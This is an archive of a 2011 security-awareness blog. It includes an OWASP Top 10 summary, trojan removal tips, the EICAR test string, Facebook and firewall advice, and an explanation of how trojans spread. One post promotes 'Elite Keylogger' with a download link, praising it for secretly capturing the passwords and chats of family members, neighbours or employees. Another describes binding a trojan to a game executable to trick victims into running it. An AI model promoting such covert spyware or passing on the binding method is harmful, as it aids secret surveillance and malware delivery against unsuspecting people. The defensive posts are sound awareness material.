ANTIHACKING

Widestep Elite Keylogger 4.8

2011-08-30T10:38:00.003-07:00

A smart and powerful low-core
(driver-mode) Keylogger engine!
Elite Keylogger is a small and
powerful keylogger application.
Elite Keylogger is the best selling
surveillance software for
monitoring and recording every
detail of PC and Internet activity
everywhere: in your home or in
your office.
Elite Keylogger includes several
integrated stealth modules that
record: chats, instant messages,
emails, websites visited,
absolutely all keystrokes, each
and every program launched, all
passwords and even Windows
logon password, usernames and
time they worked on your
computer, desktop activity,
clipboard and more.
Elite Keylogger is your only
complete privacy fortress that
will protect your PC and inform
you about every keystroke
made.Elite Keylogger provides the
equivalent of a digital
surveillance history so that you
can see exactly what your family
members, neighbours,
employees or other users are
doing on the computer.
Elite Keylogger works absolutely
secretly saving all the recordings
in a hidden location only you
know about, all the logs are
encrypted and cannot be viewed
by anyone but yo
download:

http://w w w.wupload.com/file/126965791

TOP 10 REASONS WHY WEBSITES GET HACKED

2011-07-25T10:08:00.000-07:00

Web security is at the top of customers' minds after many well-publicized personal data breaches, but the people who actually build Web applications aren't paying much attention to security, experts say.

"They're totally ignoring it," says IT consultant Joel Snyder. "When you go to your Web site design team, what you're looking for is people who are creative and able to build these interesting Web sites... That's No. 1, and No. 9 on the list would be that it's a secure Web site."

The biggest problem is designers aren't building walls within Web applications to partition and validate data moving between parts of the system, he says.

Security is usually something that's considered after a site is built rather than before it is designed, agrees Khalid Kark, senior analyst at Forrester.

"I'd say the majority of Web sites are hackable," Kark says. "The crux of the problem is security isn't thought of at the time of creating the application."

That's a big problem, and it's one the nonprofit Open Web Application Security Project (OWASP) is trying to solve. An OWASP report called "The Ten Most Critical Web Application Security Vulnerabilities" was issued this year to raise awareness about the biggest security challenges facing Web developers.

The first version of the list was released in 2004, but OWASP Chairman Jeff Williams says Web security has barely improved. New technologies such as AJAX and Rich Internet Applications that make Web sites look better also create more attack surfaces, he says. Convincing businesses their Web sites are insecure is no easy task, though.

"It's frustrating to me, because these flaws are so easy to find and so easy to exploit," says Williams, who is also CEO and co-founder of Aspect Security. "It's like missing a wall on a house."

Here is a summary of OWASP's top 10 Web vulnerabilities, including a description of each problem, real-world examples and how to fix the flaws.

1. Cross site scripting (XSS)

The problem: The "most prevalent and pernicious" Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.

Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank's Web site, according to Snyder.

Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006.

How to protect users: Use a whitelist to validate all incoming data, which rejects any data that's not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad.

Additionally, use appropriate encoding of all output data. "Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser," OWASP says.

2. Injection flaws

The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter -- which interprets text-based commands -- into executing unintended commands. "Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application," OWASP writes. "In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments."

Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.

How to protect users: Avoid using interpreters if possible. "If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries," OWASP writes.

3. Malicious file execution

The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.

Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.

How to protect users: Don't use input supplied by users in any filename for server-based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.

4. Insecure direct object reference

The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.

Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.

"References to database keys are frequently exposed," OWASP writes. "An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature."

Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.

How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can't avoid direct references, authorize Web site visitors before using them.

5. Cross site request forgery

The problem: "Simple and devastating," this attack takes control of victim's browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or "remember me" functionality. Banks are potential targets.

"Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery," Williams says. "Has there been an actual exploit where someone's lost money? Probably the banks don't even know. To the bank, all it looks like is a legitimate transaction from a logged-in user."

Real-world example: A hacker known as Samy gained more than a million "friends" on MySpace.com with a worm in late 2005, automatically including the message "Samy is my hero" in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user's language preferences.

How to protect users: Don't rely on credentials or tokens automatically submitted by browsers. "The only solution is to use a custom token that the browser will not 'remember,'" OWASP writes.
6. Information leakage and improper error handling

The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program's configuration and internal workings.

"Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks," OWASP says.

Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company's database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.

How to protect users: Use a testing tool such as OWASP'S WebScarab Project to see what errors your application generates. "Applications that have not been tested in this way will almost certainly generate unexpected error output," OWASP writes.

Another tip: disable or limit detailed error handling, and don't display debug information to users.

7. Broken authentication and session management

The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.

"Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeouts, remember me, secret question and account update," OWASP writes.

Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.

How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.

Another tip: get rid of custom cookies used for authentication or session management.

8. Insecure cryptographic storage

The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it's often poorly designed, using inappropriate ciphers.

"These flaws can lead to disclosure of sensitive data and compliance violations," OWASP writes.

Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.

Furthermore, generate keys offline, and never transmit private keys over insecure channels.

It's pretty common to store credit card numbers these days, but with a Payment Card Industry Data Security Standard https://www.pcisecuritystandards.org/ compliance deadline coming next year, OWASP says it's easier to stop storing the numbers altogether.

9. Insecure communications

The problem: Similar to No. 8, this is a failure to encrypt network traffic when it's necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.

Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.

"The $17.4-billion retailer's wireless network had less security than many people have on their home networks," the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA.

How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.

10. Failure to restrict URL access

The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there's no real protection of these pages, and hackers can find the URLs by making educated guesses. Say a URL refers to an ID number such as "123456." A hacker might say 'I wonder what's in 123457?' Williams says.

The attacks targeting this vulnerability are called forced browsing, "which encompasses guessing links and brute force techniques to find unprotected pages," OWASP says.

Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get "Platinum" passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.

How to protect users: Don't assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user's role and privileges. "Make sure this is done ... every step of the way, not just once towards the beginning of any multistep process,' OWASP advises.

HOW TO BLOCK TORJAN HORSE VIRUS

2011-07-21T11:50:00.000-07:00

Sometimes, even antivirus softwares fail in removing the trojans, or they don’t even get to know that a trojan is residing on your PC…
Here’s what you can do if that happens, and also manually protect yourselves from them and have some fun yourselves blocking them without using any other software :)
1.get a list of services that’re running on your pc…

The list of the processes that you see in the Task Manager isn’t the complete list of the processes/services running on your Pc…
To get the list of all the services that are currently running on your PC, follow these 2 steps:
Go to “Run“(Windows Logo Key + R) and type “services.msc” and hit Enter.
There you are! A complete list of services running on your PC would be there for you…And you know, this list can be used to terminate trojans that are residing on your PC!
2.how to detect trojans using it?

It’s really easy, just browse through the list and look for *weird* and *unusual* service names…most of the names that you find will be the ones that you might have came across before, like the words that begin with “Windows”. There will be a bunch of such names, and you can easily make out which one does what by looking at its description, and then note down the suspicious names.
3.clear your suspicion

Time for some research…time to see if your suspicions are really harmful or not :)
Try your suspicious names in the TrendMicro ThreatEncyclopedia and see if you get it there…If you don’t,then Google the suspicious names, you’ll surely find them :D
If you find some positives, then carry on to the next step
4.got the culprits? shut them off!

Right-click on the Trojan service and go to “Properties”
Click the “Stop” button.
In the “Start-up type” choose “Disabled”.
You’re done with it…
You have blocked a trojan manually, now the next time you turn on your PC, go to services and check if it worked :D

2>>ANTIVIRUS CHECK IT PASS OR FAILS
1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.

EICAR Test code
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to myfile.com
3. Now run the antivirus scan on this myfile.com file.
If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.
NOTE: Most antivirus will pop-out a warning message in the Step-1 itself
You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus

How To Find Out If Your Facebook Account Has Been Hacked

2011-07-16T10:37:00.003-07:00

Privacy settings are changing rapidly, and many users are confused. There’s a lot you can do to protect yourself, of course; check out Mahendra’s piece entitled “10 Solid Tips to Safeguard Your Facebook Privacy” for more information on potential Facebook security flaws.

Privacy’s not the sole concern, however; there are security risks as well. Recently, millions of stolen Facebook accounts were stolen and sold. You can protect yourself from such Facebook security flaws by regularly changing your password, and Tina wrote a piece all about picking a good password that you will not forget; be sure to check that out for good password ideas.

There’s now more you can do to protect your Facebook profile. A recent post over at Facebook’s blog explains a new security function that’ll point out when your Facebook account has been hacked and being accessed from an unfamiliar computer. It will then email you, explaining the computer your account was logged in from. This is a great way to ensure only you and you alone are logging into your Facebook account, so check it out.

Getting Started

Head over to Facebook and log in, assuming you haven’t already logged in. Click the “Account” button in the top-right corner, then click “Account Settings” to get the preferences page we’re looking for. You’ll notice a new addition: “Account Security.”

How to increse your Facebook Account Security by configuring HTTPS

2011-07-16T10:14:00.000-07:00

Now you can enable more security on your Facebook account by enabling it login on an HTTPS session. If you are a regular user of Hackstacks you must have read about this new feature in my previous article. Now the service is ready available for you! so let’s configure it and see how it can help you to secure the account from any hacking attempts!

First you need to go to Account>Account Settings>Account Security

1) Secure Browsing (https) – Enabling this feature will use https tunnel to login to your Facebook account so it gives more security when you browse from a public wi-fi or from the airport even it block man in the middle attacks and stops intercepting your browser session.

2) Logon Notification – Enabling this will notify you whenever there is an account log-in activity takes place. Meaning if someone tries to access your account from a different computer you will be notified with information such as computer name, location, IP Address, logged-in time etc.

So if you get such unusual notification on your account you can come to Account Security tab and end that activity from your account. Also make sure you change the account password ASAP.

The above screen will pop-up when you log-in from a new computer so once you enter the computer name and register it with your account it will not prompt this message next. That means the computer name will mark it as trusted under your for your Facebook profile.

Hope it was helpful. Let us know it!

WHAT ARE TORJAN HORSE?

2011-07-15T10:02:00.000-07:00

I found it necessary to devote a Topic on Trojans.
As we knowTrojan’s are probably the most compromising of
all types of attacks.Trojansare being released by the hundreds
every week, each morecleverly designed that the other.
We all know the story of theTrojan horse probably the
greatest strategic move ever made.

In my view I found that Trojans are primarily responsible
for almost all Windows(os) Based machines being compromised.
Now "What are Trojans?" are I will try to briefly explain.
'Trojans are small programs that effectively give
“hackers” remote control(through internet) over your entire Computer system'.

>Some of the common features with Trojans are :

• Ability to use your computer as a bridge to do other

• Open your CD-Rom drive

• Capture a screenshot of your computer

• Full Access to all your drives and files

• Record your key strokes and send them to the “Hacker”

>hacking related activities.

• Disable your keyboard

• Disable your mouse and many more..

Objective: Getting the potential victim to install the server
onto his/her system.

Here we take a closer look at a couple of more popular
Trojans simpler and easy to understand:

• Netbus

• SubSeven

Here is breif description about them..
(1)The NETBUS Trojan has two parts to it as almost all Trojans do.
There is a Client and a Server. The server is the file that
would have to get installed on your system in order to have
your system compromised.

(2)The SUB SEVEN Trojan has many features and capabilities. It
is in my opinion by far the most advance Trojan I have seen.

we will elaborate on them in our further posts..
keep visiting..

HOW ARE THE SYSTEM BEING COMPROMISED/HACKED?

2011-07-15T10:00:00.001-07:00

Lets Send the server file (we will call it netbusserver.exe)
to you via E-Mail.
This was how it was originally done.

The hacker would claim the file to be a game of some sort
in order you dont recognise it.
When you then double click on the file, the result is nothing.
You don’t see anything. (Suspicious :( :()
Note: (No matter many times have you double clicked on a
file someone has sent you and it apparently did
nothing)
i remember the same story when one of my friends sent
me the file in the similar way ..
well i was not so much aware of it since i trusted him..
but apparently it was a virus of the similar kind attached
with a wallpaper file..
Now here we continue
At this point what has happened is the server has now been
installed on to your system. All the “hacker” has to do is use the
Netbus Client to connect to your system and everything you
have on your system is accessible to this “hacker”(strange but true)
With increasing awareness of the use of Trojans, “hackers”
became smarter and advance antivirus used to block such clients
are every increasing in the world, Hence we move on to method 2.

Method 2
Our Objective is to explain How to Get you to install the server on your system :).

Now Let’s see, how many of you receive games from friends?
(beware "Do trust anyone blindly,Like i did ")
Games like hit gates in the face with a pie,GTAalso wallpapers,screensaver.
Perhaps the game shoot Saddam?
There are lots of funny little files like that.
Now we will show you how someone intent on getting access to
your computer can use that against you.
There are utility programs available that can combine the
(“server” (a.k.a. Trojan)) file with a legitimate “executable
file.” (An executable file is any file ending in ".exe" extension ). It will
then output another (.exe) file of some kind. Think of this
process as mixing poison in a drink mixed in a sweet dish.
For Example:
Mango Juice + Poison = something
Now the result is not really Mango Juice anymore but you can
call it whatever you want. Same procedure goes for
combining the Trojan with another file.
For Example:
The “Hacker” in question would do this: (for demonstration
purposes we’ll use a normal chess game)
Name: chess.exe (name of file that starts the chess
game with .exe extension)
Trojan: netbusserver.exe (The Trojan virus)
The joiner utility program will combine the two files together and output
1 executable file called:
.exe eg) abc.exe
This file can then be renamed back to chess.exe. It’s not
exactly the same Chess Game. It’s like the Mango Juice,
it’s just slightly different.
The difference in these files will be noticed is in their size.

The original file: chess.exe size: 50,000 bytes
The new file (with Trojan in it): chess.exe size: 65,000 bytes
(Note: These numbers and figures are just for explanation
purposes only original may differ)
The process of joining the two files, takes about 10 seconds to
get done. Now the “hacker” has a new chess file to send out
with the Trojan in it.

(?). What happens when you click on the new chess.exe file?

->: The chess program starts like normal programs. No more
suspicion because the file did something. The only difference
is while the chess program starts the Trojan also gets installed
on your system.
Now you receive an email with the attachment except in the
format of chess.exe.
The unsuspecting will execute the file and see a chess game.
Meanwhile in the background the “Trojan” gets silently
installed on your computer :) hmm.
If that’s not scary enough, after the Trojan installs itself on
your computer, it will then send a message from your
computer to the "hacker" computer telling him the
following information.

Username: (A name that victim system has)
IP Address: (Your IP address)
Online: (Your victim is online its the status)

So it doesn’t matter if you are on dial up. The potential
hacker will automatically be notified when you log on to your
computer.
You’re probably asking yourself “how likely is it that this has
happened to me?” Well think about this. Used in
conjunction with the above mentioned methods can make for
a deadly combination.
These methods are just but a few ways that “hackers” can
gain access to your machine.
Listed below are some other ways they can get the infected
file to you.
Stay in touch with us for our further post.

HOW YOU CAN GET HACKED?

2011-07-15T09:59:00.001-07:00

SOURCE

1)Email:
The most widely used delivery method. It can be sent as an
attachment in an email addressed to you.

2)IRC:
On IRC servers sometimes when you join a channel you will
automatically get sent a file like “mypic.exe” or “sexy.exe” or
sexy.jpg.vbs something to that effect. Usually you’ll find
wannabe’s are at fault for this.

As you can see there are many different ways to deliver that
file to you as a user. By informing you of these methods I
hope I have made you more aware of the potential dangers
around you. In Chapter 3 we’ll discuss what files should be
considered acceptable.

3)Grapevine:
Unfortunately there is no way to control this effect. You
receive the file from a friend who received it from a friend etc.
etc.

4)Unsafe Web sites:
Web sites that are not “above the table” so to speak. Files
downloaded from such places should always be accepted with
high suspicion.

5)News Groups:
By posting articles in newsgroups with file attachments like
(mypic.exe) in adult newsgroups are almost guaranteed to
have someone fall victim.
Don’t be fooled though, as these folks will post these files to
any newsgroups.

6)Chat Sites:
Chat sites are probably one of the primary places that this sort
of activity takes place. The sad part to that is 80% are not
aware of it.

HOW TO LEARN HACKING? WHAT IS HACKING?

2011-07-15T09:58:00.000-07:00

welcome you all..
This is my First post on my blog ,well to get into the busineess of hacking
and its preventation we will basically start knowing few thing about them..
i feel its very important to clarify the term 'hacker'. Perhaps your
definition of a hacker has been influenced and tainted over the
years. There have been various computer related activities
attributed to the term “hacker”, but were greatly misunderstood.
Unfortunately for the people who are truly defined within the
underground tech world as a “hacker” this is an insult to them.
There are various types of “hackers”, each with their own
agenda(goal).
"My only goal through this blog is to help protect you from
the worst of them."
as my mentor says " ALWAYS BE PREPARED FOR THE WORST
CASE"
Let us define what are the type of hackers
1)Anarchist Hackers
These are the individuals who you should be weary of. Their sole
intent on system infiltration is to cause damage or use
information to create havoc(chaos). They are primarily the individuals
who are responsible for the majority of system attacks against
home users. They are more likely to be interested in what lies on
another person’s machine for example yours usually people who knows you.
Mostly you’ll find that these individuals have slightly above
computer skill level and consider themselves hackers :) (LOL ). "They
glorify themselves on the accomplishments of others".

Their idea of classing themselves as a hacker is that of acquire programs
and utilities or resources readily available on the net, use these programs with
no real knowledge of how these applications work and if they
manage to “break” into someone’s system class themselves as a
hacker.They learn this through given procedures .
These individuals are called “Kiddie Hackers.”
They use these programs given to them in a malicious fashion on
anyone they can infect. They have no real purpose to what they
are doing except the fact of saying
“Yeah! I broke into computer!”

It gives them bragging rights to their friends. :) :)
If there is any damage to occur in a system being broken into
these individuals will accomplish it.
These individuals are usually high school students. They brag
about their accomplishments to their friends and try to build an
image of being hackers but not exactly.
But this is stepping stone to be a real hacker

Hackers
A hacker by definition believes in access to free information.
They are usually very intelligent people who could care very little
about what you have on your system. Their thrill comes from
system infiltration for information reasons. Hackers unlike
“crackers and anarchist” know being able to break system
security doesn’t make you a hacker any more than adding 2+2
makes you a mathematician. Unfortunately, many journalists
and writers have been fooled into using the word ‘hacker.” They
have attributed any computer related illegal activities to the term
“hacker.”
Real hackers target mainly government institution. They believe
important information can be found within government
institutions. To them the risk is worth it. The higher the security
the better the challenge. The better the challenge the better they
need to be. Who’s the best keyboard cowboy? So to speak!
These individuals come in a variety of age classes. They range
from High School students to University Grads. They are quite
adept at programming and are smart enough to stay out of the
spotlight.
They don’t particularly care about bragging about their
accomplishments as it exposes them to suspicion. They prefer to
work from behind the scenes and preserve their anonymity.
Not all hackers are loners, often you’ll find they have a very tight
circle of associates, but still there is a level of anonymity between
them. An associate of mine once said to me “if they say they are
a hacker, then they’re not!”

Crackers
For definition purposes I have included this term. This is
primarily the term given to individuals who are skilled at the art
of bypassing software copyright protection. They are usually
highly skilled in programming languages.
They are often confused with Hackers. As you can see they are
similar in their agenda. They both fight security of some kind,
but they are completely different “animals.”

Being able to attribute your attacks to the right type of attacker is
very important. By identifying your attacker to be either an
Anarchist Hacker or a Hacker you get a better idea of what you’re
up against.

“Know your enemy and know yourself and you will always be
victorious...”

HOW TO HIDE FILES IN SONY ERICSON MOBILE?

2011-07-15T09:56:00.000-07:00

This is not a trick actually,
well its a great software which
enables you to hide a file of your
intrest ,which you dont want to show othrers.
All you need to do is that install this software.
ZIPMAN.jar i have attaches here

just renmae the file which you dont want others to
acess ,yopu have to renmae the file in the folowing way

suppose you want yo hide video named NA.3gp
just rename it to NA.('whatever you want') such as NA.mm
thus this file will not be recognised by your mobile ..

you can get back the file by renaming it to its proper extension

FEATURES:
<>This software allows you to also extract a zipped flder in mobile.
<> rename a file easily.

HOW TO PREVENT HACKING?

2011-07-15T09:54:00.000-07:00

There are varoius tools avialabe to prevent your computer
from being hacked ,All the antivirus programs are
being constantly updated form time to time..
If you are in a big business it is always important
to keep your data secured and otherwise also ..
well, here are some of the tolls discussed have a look
at them...
1)FIREWALLS
A firewall in layman terms is essentially a program which filters
network data to decide whether or not to forward them to their
destination or to deny it.
This program is genrally present and inbuilt in all windows machine.
These programs will generally protect you from inbound “net
attacks.” This means unauthorized network request from foreign
computers will be blocked.
I cannot stress how important it is in this day and age to have a
firewall of some kind installed and “running” on your computer.
I personally recommend that you use one of the following or both
if you can.

Black Ice Defender
This is a very user-friendly comprehensive firewall program. I
highly recommend it to both advance and novice users. It has a
simple graphical interface that is easy to understand and pleasing
to the eye.
It detects your attacker, stops their attack and or scan and gives
you as much information available on the “attacker.”
You can download Black Ice Defender at:

http://www.networkice.com

Lockdown 2000
I also recommend Lockdown 2000 as a security measure.
Lockdown2000 has a very nice graphical interface to it also and is
user friendly. It does the same thing Black Ice Defender does but
also runs scans on your system for Trojans. It monitors your
registry and system files for changes that occur. Then gives you
the option of either undoing all the changes or allowing it.
You can obtain a copy of Lockdown2000 from:

http://www.lockdown2000.com

I find using both firewalls in conjunction with each other works
quite well. As they both compensate for the short-comings of the
other.

Anti Virus Software
This is also another piece of software you should by all means
have on your system. We all know it’s a necessity however we
are all guilty of not using them.
There are numerous anti-virus software out there. Norton
Antivirus and Mcafee are two of the more common ones. They
are all good and do their job. common antivirus prgrams
i would recomand are AVG,AVAST,NORTON and MCafee
You can find each of these programs at:
http://www.norton.com

http://www.mcafee.com

I personally recommend using 1 virus scanner and both firewalls.
The reason is I find Black Ice Defender blocks incoming attacks
and any system changes that occur on your system Lockdown
catches.

TIPS & TRICKS
I feel it necessary for you to pay particular attention to this
section. The above programs will function and do their job, but
that’s only half the battle.
There are certain precautions you need to take as a user to
ensure your system remains a “fortress.”

Tip #1:
For Dial Up users: If you are a dial up user then you use a
modem either internal or external kind to get online. If you have
an external modem then this tip is easy. If you look at the
modem you’ll see lights on the front of it.
When you’re doing anything on the net you’ll notice lights
blinking that indicate that you are Sending Data, and Receiving
Data. Depending on how often the lights blink and how fast they
blink gives a rough idea of how much activity is going on between
your computer and the net.
Here’s where a little perception comes into play. If you are
connected to the internet, and are just sitting by your system
doing absolutely nothing, those lights have no business to be
blinking rapidly. They will flash periodically indicating it’s
checking it’s connectivity, however there should be no heavy data
transfer of any kind if you are not doing anything on the net.
For Example: If you have your email program open and you are
just sitting there reading your mail, you may notice that every 15
sometimes 20 mins that the lights will blink back and forth
indicating it’s sending and receiving data. This is normal because
chances are you have your email program configured to check
your mail every 20 mins.
If by chance you notice the lights on your modem is blinking
consistently for let’s say a period of 2mins non stop be extremely
suspicious.
If you have an internal modem, you will not be able to see the
lights on your modem, instead you can rely on the two tv looking
icons at the bottom right corner of your screen near the clock.
They will look something like this.

Any data being sent and received will be noticed by the blinking
of the lights rapidly.

If you are on cable or dsl, the same applies. There should never
be any form of heavy data transfer of any kind from your system
to anything unless you are authorizing it. Some examples of
activity that can justify heavy data transfer are as follows:
• Legitimate Programs running that may need to access the
net occasionally. (ie, Email programs)
• If you are running an FTP server where people purposely
log into your machine to download files you have given
them access to.
• If you are downloading files off the internet

Things of that nature will generate a lot of data transfer.

Allow me to take this opportunity to explain to you another “Tool”
you should be aware of. Let’s assume you realize that there is a
lot of data being sent and received from your machine and you’re
not even sitting at it.
How do you know what’s going on?
Let’s do a short exercise.
• Click Start
• Go to Run (Click Run)
• Type Command
• Click OK

Again you should get a screen that looks like this.

Once you have this screen type the following:
• Netstat –a
This command will give you a listing of everything your
computer is communicating with online currently.
The list you get will look something like this:
Active Connections
Protocol Local Address Foreign Address State
TCP COMP: 0000 10.0.0.1 : 0000 ESTABLISHED
TCP COMP:2020 10.0.0.5 : 1010 ESTABLISHED
TCP COMP:9090 10.0.0.3 : 1918 ESTABLISHED

You’ll see a variety of listings like the above. It will give you the
Protocal being used, the local address (your computer) and what
port on your computer the “Foreign Address” is being connected
to and the (State) of which the (Foreign Address) is. For
example if it is (Established) then that means whatever the
foreign address says is currently connected to your machine.
There is software available that will show you this information
without typing all those commands.
The name of the software is called Xnetstat, you can obtain a
copy of it from here:
http://www.arez.com/fs/xns/

If for whatever reason you believe you are sending and receiving
a lot of data then it is wise to do a netstat –a to see what is
connected to your computer and at what ports.

Protecting Shared Resources
For those of you who have internal networks between two
computers probably have a shared resource of some kind. Earlier
in this manual I showed you how to find what is being shared.
Let’s have a look at how to protect those shared resources.
• Click Start
• Scroll up to Programs
• Go to Windows Explorer (Click on it)

Once you have done this you should see a window that comes up
with a bunch of folders listed on the left and more folders listed
on the right.
Scroll through the listing and look for whatever shared files you
have. For a refresher the folder will look like this.

Once you have found those folders you must now protect them.
• Click on The folder (once) so it is highlighted
• Use the right mouse button, (the one closest to your pinky
finger) and click on the folder.
You will get a menu:

Your menu may look different than mine, but what you’re looking
for is the word “sharing.”

When you click on Sharing you will see another window that looks
like the following.

This is where you can either share this folder or turn it off. If you
wish to turn off the sharing you would select (Not Shared).

If you must share a folder then follows these steps. This will
make the folder read only. That means no one can delete
anything from those folders if they were to break into your
system using a “Netbios” attack.

The next step is to password protect the directory.

Once you type in the password click (OK) and you’re done.
My personal suggestion is to set any directory you are sharing to
(Read Only) and password protect it. This is only if you must
share resources.

HOW TO DOWNLOAD VIDEOS FROM YOUTUBE

2011-07-15T09:52:00.001-07:00

Hello hii, well lots of my friends were asking me
"how to download videos form youtube easily?"
If you there are many methods such as using clients
such as some websites give options to download
youtube videos.
Now,above all i feel the most eficient way to downlaod
youtube videos is using IDM (internet download manger).
IDM is a download manager but it is very useful to download
youtube videos easily.
All you need to do is as follows:
1)DOWNLOAD IDM (search google using same query ).
2)INSTALL IT.
3)REBOOT YOUR SYSTEM (RECOMANDED).
4)Go to INTERNET EXPLORER.
in the URL goto the desired youtube video you want to
download Now while the video is being
played you will get a button in green on the top of
the video frame saying "CLICK HERE TO DOWNLAD"
5)just click on the button and save at the desired location.

ADVANTAGES OF USING IDM
<>The best part is the video are easily downlodable without
interupt .
<>You can also resume the download.
<>Speed is faster espicially on GPRS connectios.

hieee

2011-07-02T02:12:00.003-07:00

lol